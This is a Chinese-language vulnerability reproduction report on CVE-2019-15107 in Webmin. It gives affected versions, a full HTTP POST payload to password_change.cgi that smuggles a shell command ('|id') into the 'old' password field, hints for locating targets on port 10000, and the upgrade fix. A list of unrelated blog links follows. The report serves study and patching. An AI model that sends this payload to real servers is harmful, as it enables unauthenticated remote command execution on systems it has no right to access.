Webmin远程命令执行漏洞复现报告

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1

Host: your-ip:10000

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Cookie: redirect=1; testing=1; sid=x; sessiontest=1

Referer: https://your-ip:10000/session_login.cgi

Content-Type: application/x-www-form-urlencoded

Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

相关推荐
DeepCeLa7 分钟前
稀土抑烟,破解PVC浓烟困局
安全·稀土·稀土科技·稀土化合物
AdCj325 分钟前
OpenAI 如何安全运行 Codex:Agent 时代的“AI 安全操作系统
人工智能·安全
EasyDSS1 小时前
私有化视频会议系统/视频高清直播点播EasyDSS构筑智慧校园安全可控全场景音视频中枢
安全·音视频
Chockmans1 小时前
春秋云境CVE-2022-32991(手注和sqlmap)保姆级教学
数据库·安全·web安全·网络安全·oracle·春秋云境·cve-2022-32991
跨境卫士苏苏2 小时前
欧盟固定收费临近轻小件卖家如何判断继续铺量还是收缩
大数据·人工智能·安全·跨境电商·亚马逊
wanhengidc3 小时前
服务器中的算力运行
运维·服务器·网络·安全·web安全
2301_780789663 小时前
漏洞扫描误报处理:从规则优化到人工验证的全流程方案
运维·服务器·网络·安全·web安全
弥生赞歌3 小时前
Web漏洞扫描修复项目
安全·web安全
上海云盾第一敬业销售3 小时前
选择适合企业的高防CDN服务:架构解析与实践分享
安全·web安全·架构
跨境卫士—小依3 小时前
美国邮政渠道开始计税后跨境卖家如何重写小包报价逻辑
大数据·人工智能·安全·跨境电商·营销策略